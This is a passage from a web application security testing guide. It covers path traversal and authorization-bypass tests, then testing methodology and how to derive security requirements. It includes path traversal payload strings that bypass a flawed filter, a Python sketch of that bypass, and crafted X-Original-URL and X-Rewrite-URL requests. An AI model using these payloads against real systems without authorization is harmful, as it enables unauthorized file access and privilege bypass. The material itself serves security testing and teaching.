During a source code review, they can use simple tools (such as the grep</p><p>command) to search for one or more common patterns within the application code: inclusion functions/methods,</p><p>filesystem operations, and so on.</p><p>PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ...</p><p>JSP/Servlet: java.io.File(), java.io.FileReader(), ...</p><p>ASP: include file, include virtual, ...</p><p>Using online code search engines (e.g., Searchcode), it may also be possible to find path traversal flaws in Open</p><p>Source software published on the Internet.</p><p>For PHP, testers can use:</p><p>lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)</p><p>Using the gray-box testing method, it is possible to discover vulnerabilities that are usually harder to discover, or even</p><p>impossible to find during a standard black-box assessment.</p><p>Some web applications generate dynamic pages using values and parameters stored in a database. It may be possible</p><p>to insert specially crafted path traversal strings when the application adds data to the database. This kind of security</p><p>problem is difficult to discover due to the fact the parameters inside the inclusion functions seem internal and “safe” but</p><p>are not in reality.</p><p>Additionally, by reviewing the source code it is possible to analyze the functions that are supposed to handle invalid</p><p>input: some developers try to change invalid input to make it valid, avoiding warnings and errors. 
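</p><p>A minimal Python sketch (the filter logic is hypothetical, modeled on the replace-based sanitizer shown next) illustrates why a single, non-recursive fix-up pass can be bypassed by doubling the traversal sequence:</p><p>

```python
def naive_sanitize(filename: str) -> str:
    """A flawed fix-up filter: normalize slashes, then strip '..\\' once."""
    filename = filename.replace("/", "\\")   # '/' -> '\'
    filename = filename.replace("..\\", "")  # single, non-recursive pass
    return filename

# Doubled sequences survive: removing '..\' from '....\\' leaves '..\',
# so the "sanitized" output is still a valid traversal payload.
print(naive_sanitize("....//....//boot.ini"))  # -> ..\..\boot.ini
```

</p><p>A recursive filter, or better, canonicalizing the path and validating it against an allow list, avoids this class of bypass.</p><p>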
These functions are usually prone to security flaws.</p><p>Consider a web application with these instructions:</p><p>filename = Request.QueryString("file");</p><p>Replace(filename, "/", "\");</p><p>Replace(filename, "..\", "");</p><p>https://searchcode.com/</p><p>Testing for the flaw is achieved by:</p><p>file=....//....//boot.ini</p><p>file=....\\....\\boot.ini</p><p>file= ..\..\boot.ini</p><p>Tools</p><p>DotDotPwn - The Directory Traversal Fuzzer</p><p>Path Traversal Fuzz Strings (from WFuzz Tool)</p><p>OWASP ZAP</p><p>Burp Suite</p><p>Encoding/Decoding tools</p><p>String searcher "grep"</p><p>DirBuster</p><p>References</p><p>Whitepapers</p><p>phpBB Attachment Mod Directory Traversal HTTP POST Injection</p><p>Windows File Pseudonyms: Pwnage and Poetry</p><p>https://github.com/wireghoul/dotdotpwn</p><p>https://github.com/xmendez/wfuzz/blob/master/wordlist/Injections/Traversal.txt</p><p>https://www.zaproxy.org/</p><p>https://portswigger.net/</p><p>https://www.gnu.org/software/grep/</p><p>https://wiki.owasp.org/index.php/Category:OWASP_DirBuster_Project</p><p>https://seclists.org/vulnwatch/2004/q4/33</p><p>https://www.slideshare.net/BaronZor/windows-file-pseudonyms</p><p>Testing for Bypassing Authorization Schema</p><p>ID</p><p>WSTG-ATHZ-02</p><p>Summary</p><p>This kind of test focuses on verifying how the authorization schema has been implemented for each role or privilege to get access to reserved functions and resources.</p><p>For every specific role the tester holds during the assessment, for every function and request that the application executes during the post-authentication phase, it is necessary to verify:</p><p>Is it possible to access that resource even if the user is not authenticated?</p><p>Is it possible to access that resource after the log-out?</p><p>Is it possible to access functions and resources that should be accessible to a user that
holds a different role or privilege?</p><p>Try to access the application as an administrative user and track all the administrative functions.</p><p>Is it possible to access administrative functions even if the tester is logged in as a user with standard privileges?</p><p>Is it possible to use these administrative functions as a user with a different role and for whom that action should be denied?</p><p>How to Test</p><p>Testing for Access to Administrative Functions</p><p>For example, suppose that the AddUser.jsp function is part of the administrative menu of the application, and it is possible to access it by requesting the following URL:</p><p>https://www.example.com/admin/addUser.jsp</p><p>Then, the following HTTP request is generated when calling the AddUser function:</p><p>POST /admin/addUser.jsp HTTP/1.1</p><p>Host: www.example.com</p><p>[other HTTP headers]</p><p>userID=fakeuser&role=3&group=grp001</p><p>What happens if a non-administrative user tries to execute that request? Will the user be created? If so, can the new user use their privileges?</p><p>Testing for Access to Resources Assigned to a Different Role</p><p>For example, analyze an application that uses a shared directory to store temporary PDF files for different users. Suppose that documentABC.pdf should be accessible only by the user test1 with roleA.
Verify if user test2 with roleB can access that resource.</p><p>Testing for Special Request Header Handling</p><p>Some applications support non-standard headers such as X-Original-URL or X-Rewrite-URL in order to allow overriding the target URL in requests with the one specified in the header value.</p><p>This behavior can be leveraged in a situation in which the application is behind a component that applies access control restrictions based on the request URL.</p><p>The kind of access control restriction based on the request URL can be, for example, blocking access from the Internet to an administration console exposed on /console or /admin.</p><p>To detect support for the header X-Original-URL or X-Rewrite-URL, the following steps can be applied.</p><p>1. Send a Normal Request without Any X-Original-Url or X-Rewrite-Url Header</p><p>GET / HTTP/1.1</p><p>Host: www.example.com</p><p>[other standard HTTP headers]</p><p>2. Send a Request with an X-Original-Url Header Pointing to a Non-Existing Resource</p><p>GET / HTTP/1.1</p><p>Host: www.example.com</p><p>X-Original-URL: /donotexist1</p><p>[other standard HTTP headers]</p><p>3.
Send a Request with an X-Rewrite-Url Header Pointing to a Non-Existing Resource</p><p>GET / HTTP/1.1</p><p>Host: www.example.com</p><p>X-Rewrite-URL: /donotexist2</p><p>[other standard HTTP headers]</p><p>If the response for either request contains markers that the resource was not found, this indicates that the application supports the special request headers.</p><p>Other activities, including manually reviewing the documentation, secure coding policies, security requirements, and architectural designs, should all be accomplished using manual inspections.</p><p>Advantages</p><p>Requires no supporting technology</p><p>Can be applied to a variety of situations</p><p>Flexible</p><p>Promotes teamwork</p><p>Early in the SDLC</p><p>Disadvantages</p><p>Can be time-consuming</p><p>Supporting material not always available</p><p>Requires significant human thought and skill to be effective</p><p>Threat Modeling</p><p>Overview</p><p>Threat modeling has become a popular technique to help system designers think about the security threats that their systems and applications might face. Therefore, threat modeling can be seen as risk assessment for applications. It enables the designer to develop mitigation strategies for potential vulnerabilities and helps them focus their inevitably limited resources and attention on the parts of the system that most require it. It is recommended that all applications have a threat model developed and documented. Threat models should be created as early as possible in the SDLC, and should be revisited as the application evolves and development progresses.</p><p>To develop a threat model, we recommend taking a simple approach that follows the NIST 800-30 standard for risk assessment.
This approach involves:</p><p>Decomposing the application – use a process of manual inspection to understand how the application works, its</p><p>assets, functionality, and connectivity.</p><p>Defining and classifying the assets – classify the assets into tangible and intangible assets and rank them</p><p>according to business importance.</p><p>Exploring potential vulnerabilities - whether technical, operational, or managerial.</p><p>Exploring potential threats – develop a realistic view of potential attack vectors from an attacker’s perspective by</p><p>using threat scenarios or attack trees.</p><p>Creating mitigation strategies – develop mitigating controls for each of the threats deemed to be realistic.</p><p>The output from a threat model itself can vary but is typically a collection of lists and diagrams. The OWASP Code</p><p>Review Guide outlines an Application Threat Modeling methodology that can be used as a reference for testing</p><p>applications for potential security flaws in the design of the application. There is no right or wrong way to develop threat</p><p>models and perform information risk assessments on applications.</p><p>Advantages</p><p>Practical attacker’s view of the system</p><p>Flexible</p><p>Early in the SDLC</p><p>Disadvantages</p><p>Relatively new technique</p><p>Good threat models don’t automatically mean good software</p><p>Source Code Review</p><p>Overview</p><p>Source code review is the process of manually checking the source code of a web application for security issues. Many</p><p>serious security vulnerabilities cannot be detected with any other form of analysis or testing. As the popular saying</p><p>goes “if you want to know what’s really going on, go straight to the source.” Almost all security experts agree that there</p><p>is no substitute for actually looking at the code. 
All the information for identifying security problems is there in the code, somewhere.</p><p>https://csrc.nist.gov/publications/detail/sp/800-30/rev-1/final</p><p>Unlike testing third-party closed software such as operating systems, when testing web applications (especially if they have been developed in-house) the source code should be made available for testing purposes.</p><p>Many unintentional but significant security problems are also extremely difficult to discover with other forms of analysis or testing, such as penetration testing. This makes source code analysis the technique of choice for technical testing. With the source code, a tester can accurately determine what is happening (or is supposed to be happening) and remove the guesswork of black-box testing.</p><p>Examples of issues that are particularly conducive to being found through source code reviews include concurrency problems, flawed business logic, access control problems, and cryptographic weaknesses, as well as backdoors, Trojans, Easter eggs, time bombs, logic bombs, and other forms of malicious code. These issues often manifest themselves as the most harmful vulnerabilities in web sites. Source code analysis can also be extremely efficient at finding implementation issues such as places where input validation was not performed or where fail-open control procedures may be present. Operational procedures need to be reviewed as well, since the source code being deployed might not be the same as the one being analyzed herein.
Ken Thompson’s Turing Award speech describes one possible</p><p>manifestation of this issue.</p><p>Advantages</p><p>Completeness and effectiveness</p><p>Accuracy</p><p>Fast (for competent reviewers)</p><p>Disadvantages</p><p>Requires highly skilled security developers</p><p>Can miss issues in compiled libraries</p><p>Cannot detect run-time errors easily</p><p>The source code actually deployed might differ from the one being analyzed</p><p>For more on code review, see the OWASP code review project.</p><p>Penetration Testing</p><p>Overview</p><p>Penetration testing has been a common technique used to test network security for many years. It is also commonly</p><p>known as black-box testing or ethical hacking. Penetration testing is essentially the “art” of testing a running application</p><p>remotely to find security vulnerabilities, without knowing the inner workings of the application itself. Typically, the</p><p>penetration test team is able to access an application as if they were users. The tester acts like an attacker and attempts</p><p>to find and exploit vulnerabilities. In many cases the tester will be given a valid account on the system.</p><p>While penetration testing has proven to be effective in network security, the technique does not naturally translate to</p><p>applications. When penetration testing is performed on networks and operating systems, the majority of the work</p><p>involved is in finding, and then exploiting, known vulnerabilities in specific technologies. As web applications are</p><p>almost exclusively bespoke, penetration testing in the web application arena is more akin to pure research. Some</p><p>automated penetration testing tools have been developed, but considering the bespoke nature of web applications,</p><p>their effectiveness alone is usually poor.</p><p>Many people use web application penetration testing as their primary security testing technique. 
Whilst it certainly has its place in a testing program, we do not believe it should be considered as the primary or only testing technique. As Gary McGraw wrote in Software Penetration Testing, “In practice, a penetration test can only identify a small representative sample of all possible security risks in a system.” However, focused penetration testing (i.e., testing that attempts to exploit known vulnerabilities detected in previous reviews) can be useful in detecting if some specific vulnerabilities are actually fixed in the source code deployed on the web site.</p><p>https://ia600903.us.archive.org/11/items/pdfy-Qf4sZZSmHKQlHFfw/p761-thompson.pdf</p><p>https://wiki.owasp.org/index.php/Category:OWASP_Code_Review_Project</p><p>https://www.garymcgraw.com/wp-content/uploads/2015/11/bsi6-pentest.pdf</p><p>Advantages</p><p>Can be fast (and therefore cheap)</p><p>Requires a relatively lower skill-set than source code review</p><p>Tests the code that is actually being exposed</p><p>Disadvantages</p><p>Too late in the SDLC</p><p>Front-impact testing only</p><p>The Need for a Balanced Approach</p><p>With so many techniques and approaches to testing the security of web applications, it can be difficult to understand which techniques to use or when to use them. Experience shows that there is no right or wrong answer to the question of exactly which techniques should be used to build a testing framework. In fact, all techniques should be used to test all the areas that need to be tested.</p><p>Although it is clear that there is no single technique that can be performed to effectively cover all security testing and ensure that all issues have been addressed, many companies adopt only one approach. The single approach used has historically been penetration testing.
Penetration testing, while useful, cannot effectively address many of the issues that need to be tested. It is simply “too little too late” in the SDLC.</p><p>The correct approach is a balanced approach that includes several techniques, from manual reviews to technical testing. A balanced approach should cover testing in all phases of the SDLC. This approach leverages the most appropriate techniques available, depending on the current SDLC phase.</p><p>Of course there are times and circumstances where only one technique is possible. For example, consider a test of a web application that has already been created, but where the testing party does not have access to the source code. In this case, penetration testing is clearly better than no testing at all. However, the testing parties should be encouraged to challenge assumptions, such as not having access to source code, and to explore the possibility of more complete testing.</p><p>A balanced approach varies depending on many factors, such as the maturity of the testing process and corporate culture. It is recommended that a balanced testing framework should look something like the representations shown in Figures 2-3 and 2-4. The following figure shows a typical proportional representation overlaid onto the SDLC. In keeping with research and experience, it is essential that companies place a higher emphasis on the early stages of development.</p><p>Figure 2-3: Proportion of Test Effort in SDLC</p><p>The following figure shows a typical proportional representation overlaid onto testing techniques.</p><p>Figure 2-4: Proportion of Test Effort According to Test Technique</p><p>A Note about Web Application Scanners</p><p>Many organizations have started to use automated web application scanners.
While they undoubtedly have a place in a testing program, some fundamental issues need to be highlighted about why it is believed that automating black-box testing is not (nor will ever be) completely effective. However, highlighting these issues should not discourage the use of web application scanners. Rather, the aim is to ensure the limitations are understood and testing frameworks are planned appropriately.</p><p>It is helpful to understand the efficacy and limitations of automated vulnerability detection tools. To this end, the OWASP Benchmark Project is a test suite designed to evaluate the speed, coverage, and accuracy of automated software vulnerability detection tools and services. Benchmarking can help to test the capabilities of these automated tools, and help to make their usefulness explicit.</p><p>The following examples show why automated black-box testing may not be effective.</p><p>Example 1: Magic Parameters</p><p>Imagine a simple web application that accepts a name-value pair of “magic” and then the value. For simplicity, the GET request may be: http://www.host/application?magic=value</p><p>To further simplify the example, the values in this case can only be ASCII characters a – z (upper or lowercase) and integers 0 – 9.</p><p>The designers of this application created an administrative backdoor during testing, but obfuscated it to prevent the casual observer from discovering it. By submitting the value sf8g7sfjdsurtsdieerwqredsgnfg8d (30 characters), the user will then be logged in and presented with an administrative screen with total control of the application. The HTTP request is now: http://www.host/application?magic=sf8g7sfjdsurtsdieerwqredsgnfg8d</p><p>Given that all of the other parameters were simple two- and three-character fields, it is not feasible to start guessing combinations of approximately 30 characters.
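</p><p>The infeasibility is easy to quantify with a back-of-envelope sketch (assuming the stated alphabet of 26 lowercase letters, 26 uppercase letters, and 10 digits, and a 30-character value):</p><p>

```python
# Alphabet from the example: a-z, A-Z and 0-9 = 62 symbols per position.
alphabet = 26 + 26 + 10
length = 30

keyspace = alphabet ** length
print(f"{keyspace:.2e} candidate values")  # on the order of 10**53
```

</p><p>Even at a million requests per second, exhausting this space would take vastly longer than the age of the universe.</p><p>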
A web application scanner will need to brute force (or guess) the entire key space of 30 characters. That is roughly 62^30 permutations, far more than trillions of HTTP requests. That is an electron in a digital haystack.</p><p>https://owasp.org/www-project-benchmark/</p><p>The code for this exemplar Magic Parameter check may look like the following:</p><p>public void doPost( HttpServletRequest request, HttpServletResponse response) {</p><p>String magic = "sf8g7sfjdsurtsdieerwqredsgnfg8d";</p><p>boolean admin = magic.equals( request.getParameter("magic"));</p><p>if (admin) doAdmin( request, response);</p><p>else ... // normal processing</p><p>}</p><p>By looking at the code, the vulnerability practically leaps off the page as a potential problem.</p><p>Example 2: Bad Cryptography</p><p>Cryptography is widely used in web applications. Imagine that a developer decided to write a simple cryptography algorithm to sign a user in from site A to site B automatically. In his/her wisdom, the developer decides that if a user is logged into site A, then he/she will generate a key using an MD5 hash function that comprises: Hash { username : date }</p><p>When a user is passed to site B, he/she will send the key on the query string to site B in an HTTP redirect. Site B independently computes the hash, and compares it to the hash passed on the request. If they match, site B signs the user in as the user they claim to be.</p><p>As the scheme is explained, the inadequacies can be worked out. Anyone that figures out the scheme (or is told how it works, or downloads the information from Bugtraq) can log in as any user. Manual inspection, such as a review or code inspection, would have uncovered this security issue quickly. A black-box web application scanner would not have uncovered the vulnerability.
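</p><p>The weakness is not the hash itself but the absence of any secret in its input. A hypothetical sketch (the exact date format used by the fictional sites is an assumption) shows that anyone who knows the construction can mint a valid token for any user:</p><p>

```python
import hashlib
from datetime import date

def sso_token(username: str, day: date) -> str:
    """The flawed scheme described above: MD5(username:date), no secret key."""
    return hashlib.md5(f"{username}:{day.isoformat()}".encode()).hexdigest()

# Site B recomputes the same value, so an attacker who knows the scheme
# can forge a token for any user on any given day:
forged = sso_token("admin", date.today())
print(forged)  # a valid-looking 128-bit (32 hex character) token
```

</p><p>A keyed construction (e.g., an HMAC over a server-side secret) would prevent forgery; a black-box scanner, by contrast, only observes the resulting token.</p><p>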
It would have seen a 128-bit hash that changed with each user, and by the nature of hash functions, did not change in any predictable way.</p><p>A Note about Static Source Code Review Tools</p><p>Many organizations have started to use static source code scanners. While they undoubtedly have a place in a comprehensive testing program, it is necessary to highlight some fundamental issues about why this approach is not effective when used alone. Static source code analysis alone cannot identify issues due to flaws in the design, since it cannot understand the context in which the code is constructed. Source code analysis tools are useful in determining security issues due to coding errors; however, significant manual effort is required to validate the findings.</p><p>Deriving Security Test Requirements</p><p>To have a successful testing program, one must know what the testing objectives are. These objectives are specified by the security requirements. This section discusses in detail how to document requirements for security testing by deriving them from applicable standards and regulations, from positive application requirements (specifying what the application is supposed to do), and from negative application requirements (specifying what the application should not do). It also discusses how security requirements effectively drive security testing during the SDLC and how security test data can be used to effectively manage software security risks.</p><p>Testing Objectives</p><p>One of the objectives of security testing is to validate that security controls operate as expected. This is documented via security requirements that describe the functionality of the security control. At a high level, this means proving confidentiality, integrity, and availability of the data as well as the service.
The other objective is to validate that security controls are implemented with few or no vulnerabilities. These are common vulnerabilities, such as the OWASP Top Ten, as well as vulnerabilities that have been previously identified with security assessments during the SDLC, such as threat modeling, source code analysis, and penetration testing.</p><p>Security Requirements Documentation</p><p>https://owasp.org/www-project-top-ten/</p><p>The first step in the documentation of security requirements is to understand the business requirements. A business requirement document can provide initial high-level information on the expected functionality of the application. For example, the main purpose of an application may be to provide financial services to customers or to allow goods to be purchased from an on-line catalog. A security section of the business requirements should highlight the need to protect the customer data as well as to comply with applicable security documentation such as regulations, standards, and policies.</p><p>A general checklist of the applicable regulations, standards, and policies is a good preliminary security compliance analysis for web applications. For example, compliance regulations can be identified by checking information about the business sector and the country or state where the application will operate. Some of these compliance guidelines and regulations might translate into specific technical requirements for security controls.
For example, in the case of financial applications, compliance with the Federal Financial Institutions Examination Council guidelines for authentication requires that financial institutions implement applications that mitigate weak authentication risks with multi-layered security controls and multi-factor authentication.</p><p>Applicable industry standards for security must also be captured by the general security requirement checklist. For example, in the case of applications that handle customer credit card data, compliance with the PCI Security Standards Council Data Security Standard (DSS) forbids the storage of PINs and CVV2 data and requires that the merchant protect magnetic stripe data in storage and transmission with encryption and on display by masking. Such PCI DSS security requirements could be validated via source code analysis.</p><p>Another section of the checklist needs to enforce general requirements for compliance with the organization’s information security standards and policies. From the functional requirements perspective, requirements for the security control need to map to a specific section of the information security standards. An example of such a requirement can be: “a password complexity of ten alphanumeric characters must be enforced by the authentication controls used by the application.” When security requirements map to compliance rules, a security test can validate the exposure of compliance risks. If violations of information security standards and policies are found, these will result in a risk that can be documented and that the business has to manage. Since these security compliance requirements are enforceable, they need to be well documented and validated with security tests.</p><p>Security Requirements Validation</p><p>From the functionality perspective, the validation of security requirements is the main objective of security testing.
From the risk management perspective, the validation of security requirements is the objective of information security assessments. At a high level, the main goal of information security assessments is the identification of gaps in security controls, such as lack of basic authentication, authorization, or encryption controls. Examined further, the security assessment objective is risk analysis, such as the identification of potential weaknesses in security controls that ensure the confidentiality, integrity, and availability of the data. For example, when the application deals with personally identifiable information (PII) and sensitive data, the security requirement to be validated is the compliance with the company information security policy requiring encryption of such data in transit and in storage. Assuming encryption is used to protect the data, encryption algorithms and key lengths need to comply with the organization’s encryption standards. These might require that only certain algorithms and key lengths be used. For example, a security requirement that can be security tested is verifying that only allowed cryptographic algorithms are used (e.g., SHA-256, RSA, AES) with allowed minimum key lengths (e.g., more than 128 bits for symmetric encryption and more than 1024 bits for asymmetric encryption).</p><p>From the security assessment perspective, security requirements can be validated at different phases of the SDLC by using different artifacts and testing methodologies.
For example, threat modeling focuses on identifying security flaws during design; secure code analysis and reviews focus on identifying security issues in source code during development; and penetration testing focuses on identifying vulnerabilities in the application during testing or validation.</p><p>Security issues that are identified early in the SDLC can be documented in a test plan so they can be validated later with security tests. By combining the results of different testing techniques, it is possible to derive better security test cases and increase the level of assurance of the security requirements. For example, distinguishing true vulnerabilities from the un-exploitable ones is possible when the results of penetration tests and source code analysis are combined.</p><p>https://www.fdic.gov/news/news/financial/2011/fil11050.html</p><p>https://www.pcisecuritystandards.org/pci_security/</p><p>Considering the security test for a SQL injection vulnerability, for example, a black-box test might first involve a scan of the application to fingerprint the vulnerability. The first evidence of a potential SQL injection vulnerability that can be validated is the generation of a SQL exception. A further validation of the SQL vulnerability might involve manually injecting attack vectors to modify the grammar of the SQL query for an information disclosure exploit. This might involve a lot of trial-and-error analysis before the malicious query is executed. Assuming the tester has the source code, he or she might directly learn from the source code analysis how to construct the SQL attack vector that will successfully exploit the vulnerability (e.g., execute a malicious query returning confidential data to an unauthorized user).
This can expedite the validation of the SQL vulnerability.</p><p>Threats and Countermeasures Taxonomies</p><p>A threat and countermeasure classification, which takes into consideration root causes of vulnerabilities, is the critical factor in verifying that security controls are designed, coded, and built to mitigate the impact of the exposure of such vulnerabilities. In the case of web applications, the exposure of security controls to common vulnerabilities, such as the OWASP Top Ten, can be a good starting point to derive general security requirements. The OWASP Testing Guide Checklist is a helpful resource for guiding testers through specific vulnerabilities and validation tests.</p><p>The focus of a threat and countermeasure categorization is to define security requirements in terms of the threats and the root cause of the vulnerability. A threat can be categorized by using STRIDE, an acronym for Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege. The root cause can be categorized as a security flaw in design, a security bug in coding, or an issue due to insecure configuration. For example, the root cause of a weak authentication vulnerability might be the lack of mutual authentication when data crosses a trust boundary between the client and server tiers of the application. A security requirement that captures the threat of non-repudiation during an architecture design review allows for the documentation of the requirement for the countermeasure (e.g., mutual authentication) that can be validated later on with security tests.</p><p>A threat and countermeasure categorization for vulnerabilities can also be used to document security requirements for secure coding such as secure coding standards.
An example of a common coding error in authentication controls is applying a hash function to a password without applying a seed (salt) to the value. From the secure coding perspective, this is a vulnerability that affects the encryption used for authentication, with a root cause in a coding error. Since the root cause is insecure coding, the security requirement can be documented in secure coding standards and validated through secure code reviews during the development phase of the SDLC.

Security Testing and Risk Analysis

Security requirements need to take into consideration the severity of vulnerabilities in order to support a risk mitigation strategy. Assuming that the organization maintains a repository of vulnerabilities found in applications (i.e., a vulnerability knowledge base), the security issues can be reported by type, issue, mitigation, and root cause, and mapped to the applications where they are found. Such a vulnerability knowledge base can also be used to establish metrics to analyze the effectiveness of the security tests throughout the SDLC.

For example, consider an input validation issue, such as a SQL injection, which was identified via source code analysis and reported with a coding error root cause and an input validation vulnerability type. The exposure of such a vulnerability can be assessed via a penetration test, by probing input fields with several SQL injection attack vectors. This test might validate that special characters are filtered before reaching the database, mitigating the vulnerability. By combining the results of source code analysis and penetration testing, it is possible to determine the likelihood and exposure of the vulnerability and calculate its risk rating.
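The combination of likelihood and exposure into a risk rating can be sketched as a simple qualitative calculation. The three-level scale, numeric weights, and thresholds below are assumptions for illustration, not a prescribed OWASP scoring scheme.

```python
# Qualitative levels; the numeric weights are an illustrative assumption.
LEVELS = {"low": 1, "medium": 2, "high": 3}

def risk_rating(likelihood: str, impact: str) -> str:
    """Combine likelihood and impact into an overall rating using the
    common likelihood x impact approach; the thresholds are assumed."""
    score = LEVELS[likelihood] * LEVELS[impact]
    if score >= 6:
        return "high"
    if score >= 3:
        return "medium"
    return "low"
```

For example, `risk_rating("high", "medium")` yields a score of 6 and therefore a "high" rating.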
By reporting vulnerability risk ratings in the findings (e.g., the test report), it is possible to decide on the mitigation strategy. For example, high and medium risk vulnerabilities can be prioritized for remediation, while low risk vulnerabilities can be fixed in later releases.

By considering the threat scenarios of exploiting common vulnerabilities, it is possible to identify the potential risks that the application's security controls need to be security tested for. For example, the OWASP Top Ten vulnerabilities can be mapped to attacks such as phishing, privacy violations, identity theft, system compromise, data alteration or data destruction, financial loss, and reputation loss. Such issues should be documented as part of the threat scenarios. By thinking in terms of threats and vulnerabilities, it is possible to devise a battery of tests that simulate such attack scenarios. Ideally, the organization's vulnerability knowledge base can be used to derive security-risk-driven test cases to validate the most likely attack scenarios. For example, if identity theft is considered high risk, negative test scenarios should validate the mitigation of impacts deriving from the exploitation of vulnerabilities in authentication, cryptographic controls, input validation, and authorization controls.

Deriving Functional and Non-Functional Test Requirements

Functional Security Requirements

From the perspective of functional security requirements, the applicable standards, policies, and regulations drive both the need for a type of security control and the control's functionality.
These requirements are also referred to as "positive requirements", since they state the expected functionality that can be validated through security tests. Examples of positive requirements are: "the application will lock out the user after six failed login attempts" or "passwords need to be a minimum of ten alphanumeric characters". The validation of positive requirements consists of asserting the expected functionality, and can be tested by re-creating the testing conditions and running the test according to predefined inputs. The results are then shown as a pass or fail condition.

In order to validate security requirements with security tests, security requirements need to be function-driven. They need to highlight the expected functionality (the what) and imply the implementation (the how). Examples of high-level security design requirements for authentication are:

- Protect user credentials and shared secrets in transit and in storage.
- Mask any confidential data in display (e.g., passwords, accounts).
- Lock the user account after a certain number of failed login attempts.
- Do not show specific validation errors to the user as a result of a failed login.
- Only allow passwords that are alphanumeric, include special characters, and are a minimum of ten characters in length, to limit the attack surface.
- Allow password change functionality only to authenticated users, by validating the old password, the new password, and the user's answer to the challenge question, to prevent brute forcing of a password via password change.
- The password reset form should validate the user's username and the user's registered email before sending the temporary password to the user via email. The temporary password issued should be a one-time password. A link to the password reset web page will be sent to the user.
The password reset web page should validate the user's temporary password, the new password, and the user's answer to the challenge question.

Risk-Driven Security Requirements

Security tests must also be risk-driven. They need to validate the application against unexpected behavior, or negative requirements.

Examples of negative requirements are:

- The application should not allow the data to be altered or destroyed.
- The application should not be compromised or misused for unauthorized financial transactions by a malicious user.

Negative requirements are more difficult to test, because there is no expected behavior to look for. Looking for expected behavior to suit the above requirements might unrealistically require a threat analyst to come up with unforeseeable input conditions, causes, and effects. Hence, security testing needs to be driven by risk analysis and threat modeling. The key is to document the threat scenarios, and the functionality of the countermeasure as a factor to mitigate a threat. For example, in the case of authentication controls, the following security requirements can be documented from the threats and countermeasures perspective:

- Encrypt authentication data in storage and transit, to mitigate the risk of information disclosure and authentication protocol attacks.
- Encrypt passwords using non-reversible encryption, such as a digest (e.g., a hash) with a seed (salt), to prevent dictionary attacks.
- Lock out accounts after reaching a login failure threshold and enforce password complexity, to mitigate the risk of brute force password attacks.
- Display generic error messages upon validation of credentials, to mitigate the risk of account harvesting or enumeration.
- Mutually authenticate client and server, to prevent repudiation and man-in-the-middle (MiTM) attacks.

Threat modeling tools such as threat trees and attack libraries can be useful for deriving negative test scenarios. A threat tree assumes a root attack (e.g., an attacker might be able to read other users' messages) and identifies the different exploits of security controls (e.g., data validation fails because of a SQL injection vulnerability) and the necessary countermeasures (e.g., implement data validation and parameterized queries) that could be validated to be effective in mitigating such attacks.

Deriving Security Test Requirements Through Use and Misuse Cases

A prerequisite to describing the application functionality is to understand what the application is supposed to do and how. This can be done by describing use cases. Use cases, in the graphical form commonly used in software engineering, show the interactions of actors and their relations. They help to identify the actors in the application, their relationships, the intended sequence of actions for each scenario, alternative actions, special requirements, preconditions, and post-conditions.

Similar to use cases, misuse and abuse cases describe unintended and malicious use scenarios of the application. These misuse cases provide a way to describe scenarios of how an attacker could misuse and abuse the application. By going through the individual steps in a use scenario and thinking about how it can be maliciously exploited, potential flaws or aspects of the application that are not well defined can be discovered.